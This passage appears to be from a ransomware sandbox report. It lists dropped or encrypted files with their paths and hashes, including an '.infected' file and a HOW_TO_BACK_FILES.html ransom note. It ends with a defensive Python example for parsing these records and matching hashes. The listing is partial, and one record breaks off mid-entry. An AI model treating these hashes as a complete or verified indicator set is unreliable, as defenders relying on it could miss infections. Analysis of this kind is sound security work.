                                                                                                                                          b9b950e5570029a8512c3a819c7d0fdc89ded6a2

                                                                                                                                          SHA256

                                                                                                                                          2a999ede73d0b2e8a632959a0c8557e7d0085dfc70601c9d329c7f2d7778a586

                                                                                                                                          SHA512

                                                                                                                                          dd80f1bc7f96c4dd5f1fbae44fb9ec106fbe689033aa55c7e0ddb58a4b314ebc85b012d8d961217841a636c0eeca8f0130faf1185a96b0a658d308a753f5a31e

                                                                                                                                        • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_justify.gif

                                                                                                                                          Filesize

                                                                                                                                          2KB

                                                                                                                                          MD5

                                                                                                                                          a6aca18990b30c7b03d9d267b9bfe605

                                                                                                                                          SHA1

                                                                                                                                          c6a03f773f1133ff77eb8fd4e8a82409519504a1

                                                                                                                                          SHA256

                                                                                                                                          3e800b976344a7dd2973aed5f7042ee1d9f9032fcb4befcb551e57d7a7fb65ae

                                                                                                                                          SHA512

                                                                                                                                          c2c7b84bb98d7380192b5e378d4380075edcae7e54bf80b74df525f36b09093252438a4edc1637fc2c4da514011d6ccc654487954c5e5c8bbda63594e676ecbf

                                                                                                                                        • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_pressed.gif

                                                                                                                                          Filesize

                                                                                                                                          2KB

                                                                                                                                          MD5

                                                                                                                                          900d02b47cb7aaae0bfe14cd9b376f74

                                                                                                                                          SHA1

                                                                                                                                          2b798d7eb8580999b56626b33c5c19955b69e646

                                                                                                                                          SHA256

                                                                                                                                          41c77e3c6f3cb3446fdacc17e0b66dfb3078553a65efac6fdd77415e458d060e

                                                                                                                                          SHA512

                                                                                                                                          03f96c390febb8aa7f0762cbec5fae836f2d6ef9d88fc3a598875446a854a2f4c81d1c7e1d6a293b4ccfe2065fb107a0b2d1eeb88d35b725fb1d2197bd5bb33b

                                                                                                                                        • C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\InfoPathOMFormServices\Microsoft.Office.InfoPath.xml.infected

                                                                                                                                          Filesize

                                                                                                                                          248KB

                                                                                                                                          MD5

                                                                                                                                          ef899b6429ea294a097bdda74dd97a69

                                                                                                                                          SHA1

                                                                                                                                          b16fb57162d9e4daf87f6e382abab04bee89a701

                                                                                                                                          SHA256

                                                                                                                                          9ce2a59df0679ccfbafbaa3bb522aff25e787d1212d1fc45253d796eb8a31419

                                                                                                                                          SHA512

                                                                                                                                          f9c438946daa9940c2143342a2972b102c9d90ca72f4b4d073e9b92373a254c1be2621e855555d5b48e19421346008d4ea4a9b6b0f9c18b8d974d2aa82bc9437

                                                                                                                                        • C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\TALK21.COM.XML

                                                                                                                                          Filesize

                                                                                                                                          2KB

                                                                                                                                          MD5

                                                                                                                                          bfd8822fba10856263e56548658d519a

                                                                                                                                          SHA1

                                                                                                                                          6371a05a879cb94f08d3eb984642fcfe2b09b9a9

                                                                                                                                          SHA256

                                                                                                                                          80df43b521f25fa2a046e01459f74fa633ac1d8d2f84054d40da251b6f25d400

                                                                                                                                          SHA512

                                                                                                                                          42b32c8979f767f54dd863583d718199dd7459a994c307d2d7126ed2187a8427e071d51690ef5cd7ea32ba901b4196c19ff6e8faba74f7504c3e4562621207eb

                                                                                                                                        • C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.NO.XML

                                                                                                                                          Filesize

                                                                                                                                          2KB

                                                                                                                                          MD5

                                                                                                                                          811635f156d75e3604ce3a8751ce81f7

                                                                                                                                          SHA1

                                                                                                                                          e87c5ddcc424a9a8a23b0273fb6a9f9d0be2cb2f

                                                                                                                                          SHA256

                                                                                                                                          41da1f55bff0c246c71f4e742640be15683b4a1783b3039c684a1480d2f41999


                                                                                                                                          SHA256

                                                                                                                                          1094274d712a9ff2d589ff70389e75e846e0cb5b8565d2fff532ec2b70b24105

                                                                                                                                          SHA512

                                                                                                                                          cba232945a952a0df853a47cd379e9c19e161a0006fa5fdd59868f83b00508a38cb5782fd3098b5914e19a649efd9c0592b8e2ad585119725b16a9367cdcc489

                                                                                                                                        • C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\vlc.mo

                                                                                                                                          Filesize

                                                                                                                                          609KB

                                                                                                                                          MD5

                                                                                                                                          2ebe7920c0f1e4a6495bf69b30cdbd52

                                                                                                                                          SHA1

                                                                                                                                          b7c6dec35942dff7a0ec651988c2874fc9ab794f

                                                                                                                                          SHA256

                                                                                                                                          bad480c87ae2b7b7ff7bcb36afaa03a315781072eb9cebab9630eaa3ef55b586

                                                                                                                                          SHA512

                                                                                                                                          5f1c5e88271a2cc2338bdfecc0b3e809caf37b201afe05def4668d3dcfc8e99d7c9f47dd33c5d02051af20d669a30dcd1b786208ede05b391f25223c3acfcf77

                                                                                                                                        • C:\ProgramData\Microsoft\Assistance\Client\1.0\es-ES\Help_MValidator.Lck

                                                                                                                                          Filesize

                                                                                                                                          1KB

                                                                                                                                          MD5

                                                                                                                                          9d61121d40d5facba36956528574347c

                                                                                                                                          SHA1

                                                                                                                                          e839e5dbd065705f4ac33208e67d5ef8f3d64453

                                                                                                                                          SHA256

                                                                                                                                          3f0f8f467997bc3d157d61a8b7449c723c0cb3088977dfd11cb6f3cbda89c475

                                                                                                                                          SHA512

                                                                                                                                          29975a505687635e6551bc8dac24dc926d3208c62c4910d3780c86b3eb3f2eaa173428375359ac4c04df85c0364df0b3ef4160902a2dd4eea2f516d5aa0407bc

                                                                                                                                        • C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAD0001.000

                                                                                                                                          Filesize

                                                                                                                                          1KB

                                                                                                                                          MD5

                                                                                                                                          9f0d5dadfc3def66868f30eb57239e35

                                                                                                                                          SHA1

                                                                                                                                          82f4ad7dee5f9f20cef44ef526fb326f986ab3e6

                                                                                                                                          SHA256

                                                                                                                                          844547a5d3841c21abbe6144b39819525206eedbb48bd17e1c0e02ac4c265f02

                                                                                                                                          SHA512

                                                                                                                                          c344f70ae9d3e1566b5a3e825f98fcf6536fb33f9d25a1c10aaf6b107ded0aa01edb4286fd1ba4a35ac3b9e9349d2a47e832c9765ea0054e9fb031f9eca75e74

                                                                                                                                        • C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAD0001.002

                                                                                                                                          Filesize

                                                                                                                                          1KB

                                                                                                                                          MD5

                                                                                                                                          9d6ecb2c8a59b8b309aa5909cd477497

                                                                                                                                          SHA1

                                                                                                                                          c6094a6c6fbcc4c85f64cbb828c6f25c066e25f1

                                                                                                                                          SHA256

                                                                                                                                          1d7416951dbfc01871f9e854d8f2241f2320a01fc85ec9bf52cd6a6d4560ac69

                                                                                                                                          SHA512

                                                                                                                                          c193cb0241938e076a49cc5c7ac5bdfc43f21a7ac12e100691b3b52316cfbf61e13dc4558624b1eaae6848aa79f4ebdd985039de5b444ce47e2f0b426184f0b6

                                                                                                                                        • C:\ProgramData\Package Cache\{662A0088-6FCD-45DD-9EA7-68674058AED5}v14.30.30704\packages\vcRuntimeMinimum_amd64\vc_runtimeMinimum_x64.msi

                                                                                                                                          Filesize

                                                                                                                                          181KB

                                                                                                                                          MD5

                                                                                                                                          0ab8cbf35cd5f1aa467e7fc32c58b7d0

                                                                                                                                          SHA1

                                                                                                                                          aa1566319fd3df47b6e70d6a656459c50d4b0cfc

                                                                                                                                          SHA256

                                                                                                                                          e0a2a061cf6b2480599194c3344354c2836fef1f7a94fb7dbaf8d95b16d52e96

                                                                                                                                          SHA512

                                                                                                                                          fd6f613419f949c23dc099bb4ccb89bbd8acaddf3021d07576f0c6487c45e1be7faba8587f3001ac258df7402c34d60efc5341d2623690fc134cc1dfa1890735

                                                                                                                                        • \Device\HarddiskVolume1\Boot\da-DK\HOW_TO_BACK_FILES.html

                                                                                                                                          Filesize

                                                                                                                                          3KB

                                                                                                                                          MD5

                                                                                                                                          a8514fd9f3a52ab2a00f57494d03b2fe

                                                                                                                                          SHA1

                                                                                                                                          0e204aabbd8b5d6ee1b36d10429d65eb436afd14

                                                                                                                                          SHA256

                                                                                                                                          056ae301d1686bbf2355fd96ef3363e2b18d593f58f912498d87de3569fa9028

                                                                                                                                          SHA512

                                                                                                                                          6250481712b51d19e13bf148e3cb046fbf669398b06f8ce757a8583a0fec36ca22140cb90d4706a731f27d1419795ff37ec079d170e15e9e2985020c1e6a1d5b
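The dropped-file records above are only useful as indicators if they can be pulled out of the report layout and matched against files on a suspect host. The following Python is an added example, not part of the sandbox report or of any tool it was produced by: it parses records in the layout used here (label and value on separate lines, or "Label: value" on one line), rejects digests of the wrong length rather than silently storing a truncated IOC, indexes every digest, and looks a file's own digests up against that index. SAMPLE_RECORDS is constructed from two entries on this page; the function names and the default ransom-note filename are this example's own choices.

```python
"""
Parse sandbox "Dropped files" records into an IOC index and look a file's
digests up against it.  Added example, not part of the original report.
SAMPLE_RECORDS is constructed from two entries on this page and shows
both layouts the report is seen in.
"""
import hashlib
import re

SAMPLE_RECORDS = r"""
• C:\ProgramData\Microsoft\Assistance\Client\1.0\es-ES\Help_MValidator.Lck

  Filesize

  1KB

  MD5

  9d61121d40d5facba36956528574347c

  SHA1

  e839e5dbd065705f4ac33208e67d5ef8f3d64453

  SHA256

  3f0f8f467997bc3d157d61a8b7449c723c0cb3088977dfd11cb6f3cbda89c475

  SHA512

  29975a505687635e6551bc8dac24dc926d3208c62c4910d3780c86b3eb3f2eaa173428375359ac4c04df85c0364df0b3ef4160902a2dd4eea2f516d5aa0407bc

• \Device\HarddiskVolume1\Boot\da-DK\HOW_TO_BACK_FILES.html
  Filesize: 3KB
  MD5: a8514fd9f3a52ab2a00f57494d03b2fe
  SHA1: 0e204aabbd8b5d6ee1b36d10429d65eb436afd14
  SHA256: 056ae301d1686bbf2355fd96ef3363e2b18d593f58f912498d87de3569fa9028
  SHA512: 6250481712b51d19e13bf148e3cb046fbf669398b06f8ce757a8583a0fec36ca22140cb90d4706a731f27d1419795ff37ec079d170e15e9e2985020c1e6a1d5b
"""

# Expected hex length of each digest; anything else is a damaged IOC.
HASH_LEN = {"md5": 32, "sha1": 40, "sha256": 64, "sha512": 128}
LABELS = {"Filesize": "size", "MD5": "md5", "SHA1": "sha1", "SHA256": "sha256", "SHA512": "sha512"}
LABEL_RE = re.compile(r"^(Filesize|MD5|SHA1|SHA256|SHA512)\s*:?\s*(.*)$")


def parse_dropped_files(text):
    """Return one dict per bullet: path, size and the digests in lowercase hex.
    Lines before the first bullet (a record cut off by pagination) are skipped;
    a digest of the wrong length raises instead of being stored."""
    lines = [ln.strip() for ln in text.splitlines()]
    records, current, i = [], None, 0
    while i < len(lines):
        line = lines[i]
        i += 1
        if line.startswith("•"):
            current = {"path": line[1:].strip()}
            records.append(current)
            continue
        m = LABEL_RE.match(line)
        if not m or current is None:
            continue  # blank line, stray value, or a headless leading fragment
        key, value = LABELS[m.group(1)], m.group(2).strip()
        if not value:  # value sits on the next non-blank line
            while i < len(lines) and not lines[i]:
                i += 1
            if i >= len(lines):
                break
            value, i = lines[i], i + 1
        if key in HASH_LEN:
            value = value.lower()
            if not re.fullmatch(r"[0-9a-f]{%d}" % HASH_LEN[key], value):
                raise ValueError(f"malformed {key} for {current['path']}: {value!r}")
        current[key] = value
    return records


def build_hash_index(records):
    """Map every digest (any algorithm) to the path it was reported for."""
    return {rec[k]: rec["path"] for rec in records for k in HASH_LEN if rec.get(k)}


def hashes_of(data):
    """Digests of in-memory bytes, keyed like the report fields."""
    return {name: getattr(hashlib, name)(data).hexdigest() for name in HASH_LEN}


def match_file_bytes(data, index):
    """Return the reported path whose digest matches `data`, else None."""
    for digest in hashes_of(data).values():
        if digest in index:
            return index[digest]
    return None


def find_ransom_notes(records, note_name="HOW_TO_BACK_FILES.html"):
    """Paths whose basename is the ransom-note filename (default from this page)."""
    return [r["path"] for r in records if r["path"].rsplit("\\", 1)[-1].lower() == note_name.lower()]


if __name__ == "__main__":
    recs = parse_dropped_files(SAMPLE_RECORDS)
    print(f"{len(recs)} records, notes at: {find_ransom_notes(recs)}")
    print("match for constructed bytes:", match_file_bytes(b"not in report", build_hash_index(recs)))
```

On a real host, read each candidate file's bytes and call match_file_bytes; a hit on any one algorithm is enough, and because all four digests are indexed the lookup still works when a triage tool only produced MD5 or SHA256.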